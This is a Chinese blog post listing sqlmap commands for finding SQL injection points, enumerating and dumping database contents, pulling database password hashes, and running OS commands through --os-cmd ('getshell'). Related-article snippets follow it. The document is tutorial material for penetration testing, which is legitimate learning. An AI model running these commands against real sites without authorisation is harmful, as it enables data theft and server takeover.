Web工具篇SQLMAP(一)

最新推荐文章于 2024-02-26 00:42:22 发布
原创 最新推荐文章于 2024-02-26 00:42:22 发布 · 342 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQLMAP的基本命令,包括如何判断网站是否存在SQL注入点,查询数据库、表名及数据的方法,还涉及了一些不常用但实用的功能。通过对这些内容的学习,读者将对SQLMAP工具有更深入的理解。

SQLMAP基本命令

python sqlmap.py -hh //启动

判断是否存在注入点

python sqlmap.py -u 'URL' //GET请求方式的检测(一个参数)
python sqlmap.py -u "URL" //GET请求方式的检测(多个参数)
python sqlmap.py -u '[URL]' -forms //使用form表单POST请求
python sqlmap.py -u '[URL]' --method POST --data "[参数名=参数值]" //POST请求方式
python sqlmap.py -r upload/1.txt //将HTTP请求包放在upload/1.txt中【可放置各种请求方式】

在这里插入图片描述

查询数据库 / 表名 / 数据

python sqlmap.py -u "[URL]" --dbs //查看所有数据库
python sqlmap.py -u "[URL]" --currentdb // 查看当前数据库
python sqlmap.py -u "[URL]" -D XXX //在xxx数据库中继续查询其他数据
python sqlmap.py -u "[URL]" -D [数据库] --tables //查看某数据库中所包含的表
python sqlmap.py -u "[URL]" -D [数据库] -T XXX //在某数据库xxx表中继续查询其他数据
python sqlmap.py -u "[URL]" -D [数据库] -T [表名] --columns //查看某数据库中某表的属性
python sqlmap.py -u "[URL]" -D [数据库] -T [表名] -C [属性名] --dump //查看某数据库中某表某属性的数据

杂七杂八

python sqlmap.py --version //查看版本
python sqlmap.py -u '[URL]' --passwords //获取数据库用户密码
python sqlmap.py -u '[URL]' --current-user //获取当前用户名称
python sqlmap.py -u '[URL]' --level [1-5] //选择【1-5】测试等级,默认为1
python sqlmap.py -u '[URL]' --risk=[0-3] //选择【0-3】测试风险,默认为1
python sqlmap.py -u '[URL]' --is-dba //查看当前用户是否为管理权限
python sqlmap.py -u '[URL]' --os-cmd="[cmd命令]" //getshell
python sqlmap.py -u "[URL]" --referer "[URL]" -v [3-6] //referer欺骗

总结

还有一些进阶操作需要进一步了解应用一下
[ 渗透工具 ] sqlmap 详解() sqlmap 安装详解
qq_51577576的博客
01-11 1732
sqlmap个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。
web安全渗透测试工具(二):sqlmap常用命令和nmap常用命令
最新发布
HACKONE的博客
05-26 533
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
Web渗透之Web利器合集——sqlmap使用手册
Mr_Wanderer的博客
07-21 1126
文章目录1.获取数据指令2.指定注入类型3.辅助功能参数4.数据库相关指令5.web指纹和waf识别6.指定脚本7.shell权限--os-shell系统要求:使用--os-shell之后会生成两个文件--os-cmd=--sql-shell8.读取服务器指定文件9.更新 1.获取数据指令 -u指定注入点url -r 指定文件 –dbs跑库名 -D指定数据库 –tables跑表名 -T指定表 –columns跑字段 -C指定字段 –dump跑数据[敏感指令] –count查看数据量 2.指定注入类型 co
sqlmap简单使用
01-16 153
-u 检测存在可利用漏洞 –dbs 获取所有库 –current-db 列出当前数据库 -D 库名 --tables 查询此库中存在的表 -D 库名 -T 表名 --columns 列出表中的所有列 -D 库名 -T 表名 -C 列名1,列名2 --dump 导出列中的所有数据 sqlilabs_Less-1 python E:\sqlmap\sqlmap.py -u "url" python E:\sqlmap\sqlmap.py -u "url" --dbs python E:\sqlmap\sql
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
Jinmindong
09-28 1244
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
sqlmap命令详解
weixin_51712979的博客
12-13 1470
sqlmap注入流程 –current-db(步获取当前数据库) -D XX(数据库名)–tables -T XX (数据表名) --columns -C XX (字段名) --dump (获取内容) 简单的注入流程 1.读取数据库版本,当前用户,当前数据库 sqlmap -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db -v 1 2.判断当前数据库用户权限 sqlmap -u http://www
SQLMap 渗透工具详细讲解
ju7ran的博客
05-11 2275
我们在学习 SQLMap 的时候,可以根据官网的介绍来了解 SQLMap 的功能。官网地址:https://sqlmap.org/进入官网,我们可以看到这张图片,类似个小针头的图标,可能为了表达我是 SQL 注入……根据官网的介绍,我们可以了解到 SQLMap,是种开源渗透测试工具,它可以自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。
精选资源
SQLmap for Mac
04-13
SQLmap款开源的渗透测试工具,主要针对Web应用程序,用于检测和利用SQL注入漏洞。它能够自动识别数据库管理系统,获取数据库架构,提取数据,甚至完全控制数据库服务器。SQLmap的特性包括但不限于: 1. 自动化...
web安全期末复习文档,看这就够啦!!!
06-16
Web安全是IT领域个至关重要的主题,特别是在当前数字化时代,Web应用程序已经成为信息处理的核心平台。然而,这些应用程序也面临着各种安全威胁,如黑客攻击、数据泄露等。以下是些关于Web安全的重要知识点: 1...
免费开源的SQL注入工具SQLmap.zip
07-18
 PS:之前在wooyun上看了些关于SQLMAP的文章,受益匪浅,今天翻译这文章,是希望对于如何使用SQLMAP提供个基本的框架,SQL注入的原理以及SQLMAP详细的命令参数和不同的应用实例可以参考下面的文章: ...
Sqlmap常用命令总结
jemus17的博客
02-26 5404
sql注入,sqlmap的常用命令总结
渗透测试——SQL注入实验(Sqlmap
YT的博客
02-11 7025
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
sqlmap使用
weixin_53440207的博客
02-20 5898
sqlmap详细使用
Sqlmap参数学习笔记
qq_49091880的博客
01-04 5529
自己的学习笔记,希望各位大佬批评指正
vim常用配制文件
热门推荐
xk19yahoo的博客
07-10 14万+
vimcfg.tar.bz2.txt vim base64格式常用配制文件
mysql 网页版管理工具_Mysql渗透和利用学习
weixin_39809540的博客
11-21 1530
1、Mysql信息收集1.1主机收集3306端口的主机信息1.2版本信息的收集1.3数据库管理信息收集1.4msf信息收集模块2、Mysql密码获取2.1暴力破解2.2源代码泄漏2.3文件包含(本地文件包含)2.4其它情况3、Mysql获取webshell(利用核心 :) )3.1phpmyadmin root账号获取webshellA、直接读取后门文件(已有后面情况)B、查询select直接导...
Sqlmap详解使用
白白白
09-03 6333
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
SQLMap配置WebUI界面
weixin_34258078的博客
03-20 1803
1、概述 sqlmap款开源、功能强大的自动化SQL注入工具,支持多种数据库和多种注入方式。在注入的时候,只需输入几条命令,便能为你节约大量的人力、物力、财力。 但很少有人知道,sqlmap提供API,我们可以根据提供的API开发个前端界面。已经有大神开发完成了,他就是 Hood3dRob1n(github.com/Hood3dRob1n…),他用PHP为sqlmap开发了webui。本...
Web安全攻防之SQLmap使用
读万卷书,行万里路。
01-26 1275
Web安全攻防》使用sqli-labs来熟悉SQLmap这个神器,我也大致的熟悉下这个工具的使用吧。 SQL注入的基本步骤: 判断注入类型 获取数据库名 获取数据表名 获取字段名 获取数据 1 判断注入类型 1.1 Get类型 使用 -u 参数指定url(sqlmap关卡1) sqlmap -u "http://localhost:4000/Less-1?id=1" 需要注意的是:URL最好附带请求的参数。 sqlmap identified the following injection p
SQLMap使用指南:Web安全和CTF入门手册
**SQLMap使用手册** **1....通过阅读这SQLMap使用手册,你应能够掌握基础的使用方法,逐步探索其更多高级功能。在渗透测试和安全研究中,合理使用SQLMap可以帮助你更高效地识别和防范安全威胁。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值